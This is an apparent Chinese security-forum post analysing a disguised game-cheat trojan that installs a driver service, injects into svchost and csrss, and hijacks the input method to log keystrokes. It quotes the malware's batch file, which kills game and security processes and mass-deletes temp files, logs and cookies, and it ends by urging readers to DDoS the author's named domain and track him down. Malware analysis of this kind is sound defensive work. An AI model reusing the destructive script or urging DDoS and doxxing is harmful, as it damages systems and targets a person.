好友
阅读权限20
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Ssking 于 2015-4-14 16:27 编辑
菜鸟所做,大神勿喷【初步,未入CALL直接MD分析】所以有些函数和作用并不相对应,我没仔细入CALL直接MD,你懂
首先PEiD查壳,这作者没加壳,直接OD载入分析
首先我先配置OD,直接用小生的Jiack的Strong保护Od
首先我检查了这个程序的基本信息:
Microsoft Visual C++ 6.0 但是有问题的,这个疑似程序有伪装
不过一看程序的图标,顿时放松了,是易语言的程序,这样就好办多了
PEiD提示疑似壳子,但是我用反文件扫描器,发现无壳
程序入口附近,更是确定这个是易语言
00447A81 >/$ 55 push ebp
00447A82 |. 8BEC mov ebp,esp
00447A84 |. 6A FF push -0x1
00447A86 |. 68 F041DE00 push GD一体【.00DE41F0
00447A8B |. 68 BCC24400 push GD一体【.0044C2BC ; SE 处理程序安装
00447A90 |. 64:A1 0000000>mov eax,dword ptr fs:[0]
00447A96 |. 50 push eax
00447A97 |. 64:8925 00000>mov dword ptr fs:[0],esp
00447A9E |. 83EC 58 sub esp,0x58
00447AA1 |. 53 push ebx
00447AA2 |. 56 push esi
00447AA3 |. 57 push edi
00447AA4 |. 8965 E8 mov [local.6],esp
00447AA7 |. FF15 34734600 call dword ptr ds:[<&KERNEL32.GetVersion>; 外挂的细节配置
00447AAD |. 33D2 xor edx,edx ; ntdll.KiFastSystemCallRet
00447AAF |. 8AD4 mov dl,ah
00447AB1 |. 8915 80ADE000 mov dword ptr ds:[0xE0AD80],edx ; ntdll.KiFastSystemCallRet
00447AB7 |. 8BC8 mov ecx,eax
00447AB9 |. 81E1 FF000000 and ecx,0xFF
00447ABF |. 890D 7CADE000 mov dword ptr ds:[0xE0AD7C],ecx
00447AC5 |. C1E1 08 shl ecx,0x8
00447AC8 |. 03CA add ecx,edx ; ntdll.KiFastSystemCallRet
跟00447AA7的call发现开始写入ini文件,应该是外挂配置
0044C255 /$ 33C0 xor eax,eax
0044C257 |. 6A 00 push 0x0 ; /MaximumSize = 0x0
0044C259 |. 394424 08 cmp dword ptr ss:[esp+0x8],eax ; |
0044C25D |. 68 00100000 push 0x1000 ; |InitialSize = 1000 (4096.)
0044C262 |. 0F94C0 sete al ; |
0044C265 |. 50 push eax ; |Flags = 0
0044C266 |. FF15 E8714600 call dword ptr ds:[<&KERNEL32.HeapCreate>; \HeapCreate
…………………………………………众多无用代码掠过
0044C2AE |> \6A 01 push 0x1
0044C2B0 |. 58 pop eax ; GD一体【.00447ADF
0044C2B1 \. C3 retn
这个CALL结尾,我们返回了
00447ADF |. 59 pop ecx
ecx弹栈,应该开始其他操作
00447B07 |. FF15 58734600 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
发现这个指令和函数。疑似内存操作
往下都是些无用操作。继续单步
00447B31 |. 50 push eax ; /pStartupinfo = 0012FF64
00447B32 |. FF15 E4724600 call dword ptr ds:[<&KERNEL32.GetStartup>; \GetStartupInfoA
程序终于动了
00447B5C |. E8 DDDB0000 call GD一体【.0045573E 重要操作,各种小CALL尽在此处
到现在我才发现,这个程序是一个解压的,但是这个CALL也一起把所有该做的都做了一遍
开始创建注册表项,HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL
此后写入具体值。
HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL\Start
并且开始安装驱动了,具体CALL没有跟进,但是为那个外挂盗号提供了便捷。
最后在根目录生成一个 gb.exe和一个bat文件
终于开始具体操作了
这一个CALL内应该有很多的小CALL,以上行为完毕后,自动调用一个远的call开始下一步行动
暴露了他的盗号本性
直接修改核心注册表
具体如下
HEKY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL\ImagePath
具体的值便是 很危险的了。直接获取ROOT权限(最高权限),注入Svchost.exe 获取最高
在SVCHOST.EXE后加入-k "SRDSL"此前也是先建立这个目录写入值,现在开始具体操作了,直接调用。
然后创建money.dll,应该是外挂的相关功能
然后直接向csrss远程注入代码,获取csrss.exe的权限
又开始向原先的SRDSL注册表项开始写入一个新的值,是一个随应用启动的dll,便于程序随机启动
这个程序居然又调用CMD开始删除原先的GB.EXE
最后又开始向输入法开始进攻,我的输入法直接挂掉,只能用微软的输入法慢慢码字了
终于发现他的重要操作了,也是最终目的,利用刚才的攻击,拿下输入法,这样就可以利用comime.exe开始键盘记录了
00447B55 |. FF15 4C734600 call dword ptr ds:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
00447B5B |. 50 push eax
00447B5C |. E8 DDDB0000 call GD一体【.0045573E ; 重要操作部位,大家可以线下自己跟,发现很多操作和函数
00447B61 |. 8945 A0 mov [local.24],eax
00447B64 |. 50 push eax
00447B65 |. E8 0E300000 call GD一体【.0044AB78
00447B6A |. 8B45 EC mov eax,[local.5]
00447B6D |. 8B08 mov ecx,dword ptr ds:[eax]
00447B6F |. 8B09 mov ecx,dword ptr ds:[ecx] ; ntdll.7C92DCBA
00447B71 |. 894D 98 mov [local.26],ecx
00447B74 |. 50 push eax
00447B75 |. 51 push ecx
00447B76 |. E8 D33C0000 call GD一体【.0044B84E
00447B7B |. 59 pop ecx ; kernel32.7C817077
00447B7C |. 59 pop ecx ; kernel32.7C817077
00447B7D \. C3 retn 此程序结尾,你就要开始运行外挂了
外挂的功能相对于盗号就少了许多,直接跟上上一个程序的操作,截取你的信息直接远程发送到盗号者的电脑上
解决办法,断网全面杀毒然后删除,安全模式或者PE,普通模式无效
HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\SRDSL和相关的所有注册表,对系统文件进行替换修复
弄完了准备打包一下来着,瞄了一眼发现一个bat
直接文本打开,发现@Rasdial 宽带连接 123 123
这个代码具体是啥自己猜吧
还有一个bat很阴险,代码如下
@echo off
taskkill /f /im Crossproxy.exe
taskkill /f /im tgp_gamead.exe
taskkill /f /im Tencentdl.exe
taskkill /f /im Client.exe
taskkill /f /im DNFchina.exe
taskkill /f /im QQDL.exe
taskkill /f /im QQLogin.exe
taskkill /f /im TenSafe.exe
taskkill /f /im DNFchinaTest.exe
taskkill /f /im DNFchina.exe
taskkill /f /im TXPlatform.exe
taskkill /f /im DNF.exe
taskkill /f /im AdvertDialog.exe
taskkill /f /im IEXPLORE.EXE
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "TEMP%\*.*"
del /f /s /q "%TMP%\*.*"
del /f /s /q %userprofile%\recent\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
exit
仔细阅读就会发现,我草,tmd阴,还会扫尾。
打开外挂程序也会发现一些可以操作,但是大部分都是在解压程序身上。
菜鸟所做,大神勿喷
样本来源http://www.52pojie.cn/thread-351364-1-1.html
最后附上小黑的动态域名:guoqi518.vicp.cc 如果想黑他,下载DDOS工具,解析下域名直接D他
以及地理位置 上海市
具体大家社工,我技术有限。
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
[复制链接]
发表于 2015-4-13 16:32
|
发表于 2015-4-13 17:07
发表于 2015-4-13 21:07
很赞耶这么赞怎么没人?
